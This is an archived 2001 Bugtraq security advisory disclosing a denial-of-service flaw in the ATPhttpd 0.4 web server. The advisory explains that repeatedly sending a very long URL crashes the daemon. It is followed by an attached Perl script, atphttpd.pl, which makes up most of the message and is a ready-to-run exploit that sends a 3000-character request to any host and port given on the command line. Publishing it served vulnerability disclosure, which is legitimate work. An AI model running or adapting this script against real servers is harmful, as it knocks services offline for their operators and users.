[23497] in bugtraq
ATPhttpd 0.4 DoS Vulnerability
daemon@ATHENA.MIT.EDU (Tamer Sahin)
Thu Dec 13 19:44:53 2001
Message-ID: <00fb01c1841a$ccdb1310$959c2bd5@ts>
Reply-To: "Tamer Sahin" <ts@securityoffice.net>
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 13 Dec 2001 23:11:57 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00F8_01C1842B.8FD5ACD0"
------=_NextPart_000_00F8_01C1842B.8FD5ACD0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ATPhttpd 0.4 DoS Vulnerability
Type:
DoS, crashes Daemon
Release Date:
December 13, 2001
Product / Vendor:
ATPhttpd, the tiny, caching, high performance webserver. ATPhttpd is
ideal for serving lots of static content, especially where disk I/O
is expensive, such as NFS mounted web shares, or graphics servers.
http://www.redshift.com/~yramin/atp/atphttpd/
Summary:
Server crashes after sending very long URL a few times.
http://host/AAAAAAAAA...(Ax3000)...AAA
Log:
You may reach the core file through
http://www.securityoffice.net/downloads/atphttpd.core
Exploit:
atphttpd.pl by Tamer Sahin
http://www.securityoffice.net/downloads/atphttpd.txt
Tested:
OpenBSD 2.9 / ATPhttpd 0.4 Alpha release
Vulnerable:
ATPhttpd 0.4 Alpha release (And may be other)
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0 Fingerprint:
B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBPBj9fbuLpFMrXtywEQIuKACcDh+NkQCVj+iTV048l9ybQiWN90cAn1zw
1chZ5YPNBB46zdB7c1cSHUp3
=K1EP
-----END PGP SIGNATURE-----
------=_NextPart_000_00F8_01C1842B.8FD5ACD0
Content-Type: application/octet-stream;
name="atphttpd.pl"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="atphttpd.pl"
#!/usr/bin/perl -w
#=20
# ATPhttpd 0.4 DoS Vulnerability
#
# Type:
# DoS, crashes Daemon
#
# Release Date:
# December 13, 2001
#
# Product / Vendor:
# ATPhttpd, the tiny, caching, high performance webserver. ATPhttpd is =
ideal for serving lots of static content,=20
# especially where disk I/O is expensive, such as NFS mounted web =
shares, or graphics servers.=20
# http://www.redshift.com/~yramin/atp/atphttpd/
#
# Summary:
# Server crashes after sending very long URL a few times.
# http://host/AAAAAAAAA...(Ax3000)...AAA
#
# Log:
# You may reach the core file through
# http://www.securityoffice.net/downloads/atphttpd.core
#
# Exploit:
# atphttpd.pl by Tamer Sahin
# http://www.securityoffice.net/downloads/atphttpd.pl
#
# Tested:
# OpenBSD 2.9 / ATPhttpd 0.4 Alpha release
#
# Vulnerable:
# ATPhttpd 0.4 Alpha release (And may be other)
#
# Disclaimer:
# http://securityoffice.net is not responsible for the misuse or illegal =
use of any of the information and/or the software listed on this =
security advisory.
#
# Author:
# Tamer Sahin
# ts@securityoffice.net
# http://www.securityoffice.net
die "ATPhttpd 0.4 DoS Vulnerability / Usage: $0 host port\n" if $#ARGV =
<1;
print "DONE!\n\n";
print &GetHTTP($ARGV[0],$ARGV[1]);
exit 0;
sub GetHTTP {
use Socket;
my($remote,$doc) =3D @_;
my ($port, $iaddr, $paddr, $proto, $line,@output);
$port =3D $ARGV[1];
$sockaddr =3D 'S n a4 x8';
$doc =3D "A" x 3000;
if ($port =3D~ /\D/) { $port =3D getservbyname($port, 'tcp') }
die "No port" unless $port;
$thisaddr =3D gethostbyname("localhost");
$thataddr =3D gethostbyname($remote);
$this =3D pack($sockaddr, AF_INET, 0, $thisaddr);
$that =3D pack($sockaddr, AF_INET, $port, $thataddr);
$proto =3D getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "socket: $!";
bind(SOCK, $this) || die "bind: $!";
connect(SOCK, $that) || die "connect: $!";
select(SOCK); $| =3D 1; select(STDOUT);
print SOCK "GET $doc HTTP/1.0\n\n";
do {
$line =3D <SOCK>
} until ($line =3D~ /^\r\n/);
@output =3D <SOCK>;
close (SOCK) || die "close: $!";
@output;
}
------=_NextPart_000_00F8_01C1842B.8FD5ACD0--
